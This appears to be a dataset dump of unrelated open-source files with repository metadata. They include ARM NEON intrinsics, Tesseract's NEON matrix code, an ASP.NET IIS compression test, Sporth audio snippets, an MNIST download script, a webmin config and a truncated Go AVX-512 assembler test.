"=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int64x1x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_s64_x2 (const int64_t *__a) { int64x1x2_t ret; __builtin_aarch64_simd_oi __o; asm volatile("ld1 {%S0.1d - %T0.1d}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline float16x4x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_f16_x2 (const float16_t *__a) { float16x4x2_t ret; asm volatile("ld1 {%S0.4h - %T0.4h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline float32x2x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_f32_x2 (const float32_t *__a) { float32x2x2_t ret; asm volatile("ld1 {%S0.2s - %T0.2s}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline float64x1x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_f64_x2 (const float64_t *__a) { float64x1x2_t ret; asm volatile("ld1 {%S0.1d - %T0.1d}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline poly8x8x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_p8_x2 (const poly8_t *__a) { poly8x8x2_t ret; asm volatile("ld1 {%S0.8b - %T0.8b}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline poly16x4x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_p16_x2 (const poly16_t *__a) { poly16x4x2_t ret; asm volatile("ld1 {%S0.4h - %T0.4h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline poly64x1x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1_p64_x2 (const poly64_t *__a) { poly64x1x2_t ret; asm volatile("ld1 {%S0.1d - %T0.1d}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline uint8x16x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_u8_x2 (const uint8_t *__a) { uint8x16x2_t ret; asm volatile("ld1 {%S0.16b - %T0.16b}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int8x16x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_s8_x2 (const int8_t *__a) { int8x16x2_t ret; asm volatile("ld1 {%S0.16b - %T0.16b}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline uint16x8x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_u16_x2 (const uint16_t *__a) { uint16x8x2_t ret; asm volatile("ld1 {%S0.8h - %T0.8h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int16x8x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_s16_x2 (const int16_t *__a) { int16x8x2_t ret; asm volatile("ld1 {%S0.8h - %T0.8h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline uint32x4x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_u32_x2 (const uint32_t *__a) { uint32x4x2_t ret; asm volatile("ld1 {%S0.4s - %T0.4s}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int32x4x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_s32_x2 (const int32_t *__a) { int32x4x2_t ret; asm volatile("ld1 {%S0.4s - %T0.4s}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline uint64x2x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_u64_x2 (const uint64_t *__a) { uint64x2x2_t ret; asm volatile("ld1 {%S0.2d - %T0.2d}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline int64x2x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_s64_x2 (const int64_t *__a) { int64x2x2_t ret; asm volatile("ld1 {%S0.2d - %T0.2d}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline float16x8x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_f16_x2 (const float16_t *__a) { float16x8x2_t ret; asm volatile("ld1 {%S0.8h - %T0.8h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline float32x4x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_f32_x2 (const float32_t *__a) { float32x4x2_t ret; asm volatile("ld1 {%S0.4s - %T0.4s}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline float64x2x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_f64_x2 (const float64_t *__a) { float64x2x2_t ret; asm volatile("ld1 {%S0.2d - %T0.2d}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline poly8x16x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_p8_x2 (const poly8_t *__a) { poly8x16x2_t ret; asm volatile("ld1 {%S0.16b - %T0.16b}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline poly16x8x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_p16_x2 (const poly16_t *__a) { poly16x8x2_t ret; asm volatile("ld1 {%S0.8h - %T0.8h}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } __extension__ extern __inline poly64x2x2_t __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vld1q_p64_x2 (const poly64_t *__a) { poly64x2x2_t ret; asm volatile("ld1 {%S0.2d - %T0.2d}, %1" : "=w" (ret) : "Q"(*__a)); return ret; } /* vst1x2 */ __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_s64_x2 (int64_t * __a, int64x1x2_t val) { asm volatile("st1 {%S1.1d - %T1.1d}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_u64_x2 (uint64_t * __a, uint64x1x2_t val) { asm volatile("st1 {%S1.1d - %T1.1d}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_f64_x2 (float64_t * __a, float64x1x2_t val) { asm volatile("st1 {%S1.1d - %T1.1d}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_s8_x2 (int8_t * __a, int8x8x2_t val) { asm volatile("st1 {%S1.8b - %T1.8b}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_p8_x2 (poly8_t * __a, poly8x8x2_t val) { asm volatile("st1 {%S1.8b - %T1.8b}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_s16_x2 (int16_t * __a, int16x4x2_t val) { asm volatile("st1 {%S1.4h - %T1.4h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_p16_x2 (poly16_t * __a, poly16x4x2_t val) { asm volatile("st1 {%S1.4h - %T1.4h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_s32_x2 (int32_t * __a, int32x2x2_t val) { asm volatile("st1 {%S1.2s - %T1.2s}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_u8_x2 (uint8_t * __a, uint8x8x2_t val) { asm volatile("st1 {%S1.8b - %T1.8b}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_u16_x2 (uint16_t * __a, uint16x4x2_t val) { asm volatile("st1 {%S1.4h - %T1.4h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_u32_x2 (uint32_t * __a, uint32x2x2_t val) { asm volatile("st1 {%S1.2s - %T1.2s}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_f16_x2 (float16_t * __a, float16x4x2_t val) { asm volatile("st1 {%S1.4h - %T1.4h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_f32_x2 (float32_t * __a, float32x2x2_t val) { asm volatile("st1 {%S1.2s - %T1.2s}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1_p64_x2 (poly64_t * __a, poly64x1x2_t val) { asm volatile("st1 {%S1.1d - %T1.1d}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_s8_x2 (int8_t * __a, int8x16x2_t val) { asm volatile("st1 {%S1.16b - %T1.16b}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_p8_x2 (poly8_t * __a, poly8x16x2_t val) { asm volatile("st1 {%S1.16b - %T1.16b}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_s16_x2 (int16_t * __a, int16x8x2_t val) { asm volatile("st1 {%S1.8h - %T1.8h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_p16_x2 (poly16_t * __a, poly16x8x2_t val) { asm volatile("st1 {%S1.8h - %T1.8h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_s32_x2 (int32_t * __a, int32x4x2_t val) { asm volatile("st1 {%S1.4s - %T1.4s}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_s64_x2 (int64_t * __a, int64x2x2_t val) { asm volatile("st1 {%S1.2d - %T1.2d}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_u8_x2 (uint8_t * __a, uint8x16x2_t val) { asm volatile("st1 {%S1.16b - %T1.16b}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_u16_x2 (uint16_t * __a, uint16x8x2_t val) { asm volatile("st1 {%S1.8h - %T1.8h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_u32_x2 (uint32_t * __a, uint32x4x2_t val) { asm volatile("st1 {%S1.4s - %T1.4s}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_u64_x2 (uint64_t * __a, uint64x2x2_t val) { asm volatile("st1 {%S1.2d - %T1.2d}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_f16_x2 (float16_t * __a, float16x8x2_t val) { asm volatile("st1 {%S1.8h - %T1.8h}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_f32_x2 (float32_t * __a, float32x4x2_t val) { asm volatile("st1 {%S1.4s - %T1.4s}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_f64_x2 (float64_t * __a, float64x2x2_t val) { asm volatile("st1 {%S1.2d - %T1.2d}, %0" : "=Q" (*__a) : "w" (val)); } __extension__ extern __inline void __attribute__ ((__always_inline__, __gnu_inline__, __artificial__)) vst1q_p64_x2 (poly64_t * __a, poly64x2x2_t val) { asm volatile("st1 {%S1.2d - %T1.2d}, %0" : "=Q" (*__a) : "w" (val)); }
C
4
Hacky-DH/pytorch
aten/src/ATen/cpu/vec/vec256/missing_vld1_neon.h
[ "Intel" ]
exports_file=Fil med exporterade filsystem,0 restart_command=Kommando för att starta om exportserver,0
SystemVerilog
0
GalaxyGFX/webmin
hpuxexports/config.info.sv
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
// Licensed to the .NET Foundation under one or more agreements. // The .NET Foundation licenses this file to you under the MIT license. using System; using System.Collections.Generic; using System.Net; using System.Net.Http; using System.Net.Http.Headers; using System.Threading.Tasks; using Microsoft.AspNetCore.Testing; using Xunit; #if !IIS_FUNCTIONALS using Microsoft.AspNetCore.Server.IIS.FunctionalTests; #if IISEXPRESS_FUNCTIONALS namespace Microsoft.AspNetCore.Server.IIS.IISExpress.FunctionalTests #elif NEWHANDLER_FUNCTIONALS namespace Microsoft.AspNetCore.Server.IIS.NewHandler.FunctionalTests #elif NEWSHIM_FUNCTIONALS namespace Microsoft.AspNetCore.Server.IIS.NewShim.FunctionalTests #endif #else namespace Microsoft.AspNetCore.Server.IIS.FunctionalTests #endif { [Collection(IISCompressionSiteCollection.Name)] public class CompressionTests : FixtureLoggedTest { private readonly IISCompressionSiteFixture _fixture; public CompressionTests(IISCompressionSiteFixture fixture): base(fixture) { _fixture = fixture; } [ConditionalFact] [RequiresIIS(IISCapability.DynamicCompression)] public async Task BufferingDisabledWithCompressedRequest() { using (var connection = _fixture.CreateTestConnection()) { var requestLength = 0; var messages = new List<string>(); for (var i = 1; i < 100; i++) { var message = i + Environment.NewLine; requestLength += message.Length; messages.Add(message); } await connection.Send( "POST /ReadAndWriteEchoLinesNoBuffering HTTP/1.1", $"Content-Length: {requestLength}", "Accept-Encoding: gzip", "Response-Content-Type: text/event-stream", "Host: localhost", "Connection: close", "", ""); await connection.Receive( "HTTP/1.1 200 OK", ""); await connection.ReceiveHeaders(); foreach (var message in messages) { await connection.Send(message); await connection.ReceiveChunk(message); } await connection.Send("\r\n"); await connection.ReceiveChunk(""); await connection.WaitForConnectionClose(); } } [ConditionalFact] [RequiresIIS(IISCapability.DynamicCompression)] public async Task BufferingDisabledWithoutCompressedRequest() { using (var connection = _fixture.CreateTestConnection()) { var requestLength = 0; var messages = new List<string>(); for (var i = 1; i < 100; i++) { var message = i + Environment.NewLine; requestLength += message.Length; messages.Add(message); } await connection.Send( "POST /ReadAndWriteEchoLinesNoBuffering HTTP/1.1", $"Content-Length: {requestLength}", "Accept-Encoding: identity", "Response-Content-Type: text/event-stream", "Host: localhost", "Connection: close", "", ""); await connection.Receive( "HTTP/1.1 200 OK", ""); await connection.ReceiveHeaders(); foreach (var message in messages) { await connection.Send(message); await connection.ReceiveChunk(message); } await connection.Send("\r\n"); await connection.ReceiveChunk(""); await connection.WaitForConnectionClose(); } } [ConditionalFact] [RequiresIIS(IISCapability.DynamicCompression)] public async Task DynamicResponsesAreCompressed() { var handler = new HttpClientHandler { AutomaticDecompression = DecompressionMethods.GZip }; var client = new HttpClient(handler) { BaseAddress = _fixture.Client.BaseAddress, }; client.DefaultRequestHeaders.AcceptEncoding.Add(new StringWithQualityHeaderValue("gzip")); client.DefaultRequestHeaders.AcceptEncoding.Add(new StringWithQualityHeaderValue("identity", 0)); client.DefaultRequestHeaders.Add("Response-Content-Type", "text/event-stream"); var messages = "Message1\r\nMessage2\r\n\r\n"; // Send messages with terminator var response = await client.PostAsync("ReadAndWriteEchoLines", new StringContent(messages)); Assert.Equal(messages, await response.Content.ReadAsStringAsync()); Assert.True(response.Content.Headers.TryGetValues("Content-Type", out var contentTypes)); Assert.Single(contentTypes, "text/event-stream"); // Not the cleanest check but I wasn't able to figure out other way to check // that response was compressed Assert.Contains("gzip", response.Content.GetType().FullName, StringComparison.OrdinalIgnoreCase); } } }
C#
5
tomaswesterlund/aspnetcore
src/Servers/IIS/IIS/test/Common.FunctionalTests/CompressionTests.cs
[ "MIT" ]
60 140 4 * / dmetro dup 3 0 tdiv 0.01 0.01 0.2 tenv 62 mtof 0.5 1 1 1 fm * swap dup 4 1 tdiv 0.01 0.01 0.2 tenv 64 mtof 0.5 1 1 1 fm * swap dup 5 2 tdiv 0.01 0.01 0.2 tenv 71 mtof 0.5 1 1 1 fm * swap 7 3 tdiv 0.001 0.01 0.6 tenv 66 mtof 0.5 1 1 1 fm * mix -6 ampdb *
SourcePawn
2
aleatoricforest/Sporth
examples/tdiv.sp
[ "MIT" ]
1 noise 10 metro samphold 100 500 scale 0.1 sine
SourcePawn
1
aleatoricforest/Sporth
examples/samphold.sp
[ "MIT" ]
#!/usr/bin/env bash # See http://yann.lecun.com/exdb/mnist/ MNIST_TARGET_DIRECTORY="`pwd`/build/3rd-party/MNIST" echo "Downloading MNIST databases into $MNIST_TARGET_DIRECTORY ..." mkdir -p $MNIST_TARGET_DIRECTORY cd $MNIST_TARGET_DIRECTORY wget -nv -N http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz wget -nv -N http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz wget -nv -N http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz wget -nv -N http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz gunzip -fk *.gz
Shell
4
benasher44/kotlin-native
samples/torch/downloadMNIST.sh
[ "ECL-2.0", "Apache-2.0" ]
/////////////////////////////////////////////////////////////////////// // File: intsimdmatrixneon.cpp // Description: matrix-vector product for 8-bit data on neon. // Author: Robin Watts (from the AVX2 original by Ray Smith) // // (C) Copyright 2017, Google Inc. // (C) Copyright 2020, Artifex Software Inc. // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // http://www.apache.org/licenses/LICENSE-2.0 // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. /////////////////////////////////////////////////////////////////////// #if defined(__ARM_NEON) # include "intsimdmatrix.h" # include "tesstypes.h" # include <algorithm> # include <cstdint> # include <vector> # include "arm_neon.h" namespace tesseract { // Number of outputs held in each register. (Actually, we use a // pair of 4x32 registers, so 8 x 32 bit ints). constexpr int kNumOutputsPerRegister = 8; // Maximum number of registers that we will use. constexpr int kMaxOutputRegisters = 1; // Number of inputs in the inputs register. constexpr int kNumInputsPerRegister = 8; // Number of inputs in each weight group. constexpr int kNumInputsPerGroup = 8; // Function to compute part of a matrix.vector multiplication. The weights // are in a very specific order (see above) in w, which is multiplied by // u of length num_in, to produce output v after scaling the integer results // by the corresponding member of scales. // The amount of w and scales consumed is fixed and not available to the // caller. // Computes part of matrix.vector v = Wu. Computes N=8 results. // The weights *must* be arranged so that consecutive reads from wi // provides (num_in/kNumInputsPerGroup groups of (N output dim groups of // (kNumInputsPerGroup inputs))). After that there must be N consecutive // bias weights, before continuing with any more weights. // u must be padded out with zeros to // kNumInputsPerGroup*ceil(num_in/kNumInputsPerGroup) elements. static inline void PartialMatrixDotVector8(const int8_t *__restrict wi, const TFloat *__restrict scales, const int8_t *__restrict u, int num_in, TFloat *__restrict v, int num_out) { // Initialize all the results to 0. int32x4_t result0123 = {0, 0, 0, 0}; int32x4_t result4567 = {0, 0, 0, 0}; int8x8_t bias_scale = {127, 127, 127, 127, 127, 127, 127, 127}; // Iterate over the input (u), one registerful at a time. for (int j = 0; j < num_in; j += 8) { int8x8_t vu = vld1_s8(u); // vu = u0 u1 u2 u3 u4 u5 u6 u7 int8x16_t vw01 = vld1q_s8(wi); // vw0 = w00 w01 w02 w03 w04 w05 w06 w07 // w10 w11 w12 w13 w14 w15 w16 w17 int8x16_t vw23 = vld1q_s8(wi + 8 * 2); // vw2 = w20 w21 w22 w23 w24 w25 w26 w27 w30 // w31 w32 w33 w34 w35 w36 w37 int8x16_t vw45 = vld1q_s8(wi + 8 * 4); // vw4 = w40 w41 w42 w43 w44 w45 w46 w47 w50 // w51 w52 w53 w54 w55 w56 w57 int8x16_t vw67 = vld1q_s8(wi + 8 * 6); // vw6 = w60 w61 w62 w63 w64 w65 w66 w67 w70 // w71 w72 w73 w74 w75 w76 w77 int16x8_t vrow0q = vmull_s8(vget_low_s8(vw01), vu); // vrow0q = vw00.u0 w01.u1 w02.u2 // w03.u3 vw04.u4 w05.u5 w06.u6 w07.u7 int16x8_t vrow1q = vmull_s8(vget_high_s8(vw01), vu); // vrow1q = vw10.u0 w11.u1 w12.u2 w13.u3 // vw14.u4 w15.u5 w16.u6 w17.u7 int16x8_t vrow2q = vmull_s8(vget_low_s8(vw23), vu); // vrow2q = vw20.u0 w21.u1 w22.u2 // w23.u3 vw24.u4 w25.u5 w26.u6 w27.u7 int16x8_t vrow3q = vmull_s8(vget_high_s8(vw23), vu); // vrow3q = vw30.u0 w31.u1 w32.u2 w33.u3 // vw34.u4 w35.u5 w36.u6 w37.u7 int16x8_t vrow4q = vmull_s8(vget_low_s8(vw45), vu); // vrow4q = vw40.u0 w41.u1 w42.u2 // w43.u3 vw44.u4 w45.u5 w46.u6 w47.u7 int16x8_t vrow5q = vmull_s8(vget_high_s8(vw45), vu); // vrow5q = vw50.u0 w51.u1 w52.u2 w53.u3 // vw54.u4 w55.u5 w56.u6 w57.u7 int16x8_t vrow6q = vmull_s8(vget_low_s8(vw67), vu); // vrow6q = vw60.u0 w61.u1 w62.u2 // w63.u3 vw64.u4 w65.u5 w66.u6 w67.u7 int16x8_t vrow7q = vmull_s8(vget_high_s8(vw67), vu); // vrow7q = vw70.u0 w71.u1 w72.u2 w73.u3 // vw74.u4 w75.u5 w76.u6 w77.u7 int32x4_t vrow0q2 = vpaddlq_s16(vrow0q); // vrow0q2 = vw00.u0+w01.u1 w02.u2+w03.u3 // vw04.u4+w05.u5 w06.u6+w07.u7 int32x4_t vrow1q2 = vpaddlq_s16(vrow1q); // vrow1q2 = vw10.u0+w11.u1 w12.u2+w13.u3 // vw14.u4+w15.u5 w16.u6+w17.u7 int32x4_t vrow2q2 = vpaddlq_s16(vrow2q); // vrow2q2 = vw20.u0+w21.u1 w22.u2+w23.u3 // vw24.u4+w25.u5 w26.u6+w27.u7 int32x4_t vrow3q2 = vpaddlq_s16(vrow3q); // vrow3q2 = vw30.u0+w31.u1 w32.u2+w33.u3 // vw34.u4+w35.u5 w36.u6+w37.u7 int32x4_t vrow4q2 = vpaddlq_s16(vrow4q); // vrow4q2 = vw40.u0+w41.u1 w42.u2+w43.u3 // vw44.u4+w45.u5 w46.u6+w47.u7 int32x4_t vrow5q2 = vpaddlq_s16(vrow5q); // vrow5q2 = vw50.u0+w51.u1 w52.u2+w53.u3 // vw54.u4+w55.u5 w56.u6+w57.u7 int32x4_t vrow6q2 = vpaddlq_s16(vrow6q); // vrow6q2 = vw60.u0+w61.u1 w62.u2+w63.u3 // vw64.u4+w65.u5 w66.u6+w67.u7 int32x4_t vrow7q2 = vpaddlq_s16(vrow7q); // vrow7q2 = vw70.u0+w71.u1 w72.u2+w73.u3 // vw74.u4+w75.u5 w76.u6+w77.u7 vrow0q2 = vcombine_s32(vpadd_s32(vget_low_s32(vrow0q2), vget_high_s32(vrow0q2)), vpadd_s32(vget_low_s32(vrow1q2), vget_high_s32(vrow1q2))); // vrow0q2 = vw00.u0+...+w03.u3 vw04.u4+...+w07.u7 vw10.u0+...+w13.u3 // vw14.u4+...+w17.u7 vrow2q2 = vcombine_s32(vpadd_s32(vget_low_s32(vrow2q2), vget_high_s32(vrow2q2)), vpadd_s32(vget_low_s32(vrow3q2), vget_high_s32(vrow3q2))); // vrow0q2 = vw20.u0+...+w23.u3 vw24.u4+...+w27.u7 vw30.u0+...+w33.u3 // vw34.u4+...+w37.u7 vrow4q2 = vcombine_s32(vpadd_s32(vget_low_s32(vrow4q2), vget_high_s32(vrow4q2)), vpadd_s32(vget_low_s32(vrow5q2), vget_high_s32(vrow5q2))); // vrow0q2 = vw40.u0+...+w43.u3 vw44.u4+...+w47.u7 vw50.u0+...+w53.u3 // vw54.u4+...+w57.u7 vrow6q2 = vcombine_s32(vpadd_s32(vget_low_s32(vrow6q2), vget_high_s32(vrow6q2)), vpadd_s32(vget_low_s32(vrow7q2), vget_high_s32(vrow7q2))); // vrow0q2 = vw60.u0+...+w63.u3 vw64.u4+...+w67.u7 vw70.u0+...+w73.u3 // vw74.u4+...+w77.u7 vrow0q2 = vcombine_s32(vpadd_s32(vget_low_s32(vrow0q2), vget_high_s32(vrow0q2)), vpadd_s32(vget_low_s32(vrow2q2), vget_high_s32(vrow2q2))); // vrow0q2 = vw00.u0+...+w07.u7 vw10.u0+...+w17.u7 vw20.u0+...+w27.u7 // vw30.u0+...+w37.u7 vrow4q2 = vcombine_s32(vpadd_s32(vget_low_s32(vrow4q2), vget_high_s32(vrow4q2)), vpadd_s32(vget_low_s32(vrow6q2), vget_high_s32(vrow6q2))); // vrow0q2 = vw40.u0+...+w47.u7 vw50.u0+...+w57.u7 vw60.u0+...+w67.u7 // vw70.u0+...+w77.u7 result0123 = vaddq_s32(result0123, vrow0q2); result4567 = vaddq_s32(result4567, vrow4q2); u += 8; wi += 64; } { int8x8_t bias = vld1_s8(wi); // vw0 = b0 b1 b2 b3 b4 b5 b6 b7 int16x8_t scaled_bias = vmull_s8(bias, bias_scale); result0123 = vaddw_s16(result0123, vget_low_s16(scaled_bias)); result4567 = vaddw_s16(result4567, vget_high_s16(scaled_bias)); *v++ = vget_lane_s32(vget_low_s32(result0123), 0) * *scales++; if (num_out > 1) *v++ = vget_lane_s32(vget_low_s32(result0123), 1) * *scales++; if (num_out > 2) *v++ = vget_lane_s32(vget_high_s32(result0123), 0) * *scales++; if (num_out > 3) *v++ = vget_lane_s32(vget_high_s32(result0123), 1) * *scales++; if (num_out > 4) *v++ = vget_lane_s32(vget_low_s32(result4567), 0) * *scales++; if (num_out > 5) *v++ = vget_lane_s32(vget_low_s32(result4567), 1) * *scales++; if (num_out > 6) *v++ = vget_lane_s32(vget_high_s32(result4567), 0) * *scales++; if (num_out > 7) *v = vget_lane_s32(vget_high_s32(result4567), 1) * *scales; } } static void matrixDotVector(int dim1, int dim2, const int8_t *wi, const TFloat *scales, const int8_t *u, TFloat *v) { const int num_out = dim1; const int num_in = dim2 - 1; // Each call to a partial_func_ produces group_size outputs, except the // last one, which can produce less. const int rounded_num_in = IntSimdMatrix::Roundup(num_in, kNumInputsPerGroup); int group_size = kNumOutputsPerRegister * kMaxOutputRegisters; int output = 0; int w_step = (rounded_num_in + 1) * group_size; for (; output + group_size <= num_out; output += group_size) { PartialMatrixDotVector8(wi, scales, u, rounded_num_in, v, kNumOutputsPerRegister); wi += w_step; scales += group_size; v += group_size; } if (output < num_out) PartialMatrixDotVector8(wi, scales, u, rounded_num_in, v, num_out & (kNumOutputsPerRegister - 1)); } const IntSimdMatrix IntSimdMatrix::intSimdMatrixNEON = { // Function. matrixDotVector, // Number of 32 bit outputs held in each register. kNumOutputsPerRegister, // Maximum number of registers that we will use to hold outputs. kMaxOutputRegisters, // Number of 8 bit inputs in the inputs register. kNumInputsPerRegister, // Number of inputs in each weight group. kNumInputsPerGroup }; } // namespace tesseract. #endif /* __ARM_NEON */
C++
5
quangzinhh/tesseract
src/arch/intsimdmatrixneon.cpp
[ "Apache-2.0" ]
// Code generated by avx512test. DO NOT EDIT. #include "../../../../../../runtime/textflag.h" TEXT asmtest_avx512pf(SB), NOSPLIT, $0 VGATHERPF0DPD K5, (R10)(Y29*8) // 6292fd45c60cea VGATHERPF0DPD K5, (SP)(Y4*2) // 62f2fd4dc60c64 VGATHERPF0DPD K5, (DX)(Y10*4) // 62b2fd4dc60c92 VGATHERPF0DPS K3, (BP)(Z10*2) // 62b27d4bc64c5500 VGATHERPF0DPS K3, (R10)(Z29*8) // 62927d43c60cea VGATHERPF0DPS K3, (R14)(Z29*8) // 62927d43c60cee VGATHERPF0QPD K4, (DX)(Z10*4) // 62b2fd4cc70c92 VGATHERPF0QPD K4, (AX)(Z4*1) // 62f2fd4cc70c20 VGATHERPF0QPD K4, (SP)(Z4*2) // 62f2fd4cc70c64 VGATHERPF0QPS K2, (BP)(Z10*2) // 62b27d4ac74c5500 VGATHERPF0QPS K2, (R10)(Z29*8) // 62927d42c70cea VGATHERPF0QPS K2, (R14)(Z29*8) // 62927d42c70cee VGATHERPF1DPD K2, (R14)(Y29*8) // 6292fd42c614ee VGATHERPF1DPD K2, (AX)(Y4*1) // 62f2fd4ac61420 VGATHERPF1DPD K2, (BP)(Y10*2) // 62b2fd4ac6545500 VGATHERPF1DPS K3, (DX)(Z10*4) // 62b27d4bc61492 VGATHERPF1DPS K3, (AX)(Z4*1) // 62f27d4bc61420 VGATHERPF1DPS K3, (SP)(Z4*2) // 62f27d4bc61464 VGATHERPF1QPD K3, (DX)(Z10*4) // 62b2fd4bc71492 VGATHERPF1QPD K3, (AX)(Z4*1) // 62f2fd4bc71420 VGATHERPF1QPD K3, (SP)(Z4*2) // 62f2fd4bc71464 VGATHERPF1QPS K3, (BP)(Z10*2) // 62b27d4bc7545500 VGATHERPF1QPS K3, (R10)(Z29*8) // 62927d43c714ea VGATHERPF1QPS K3, 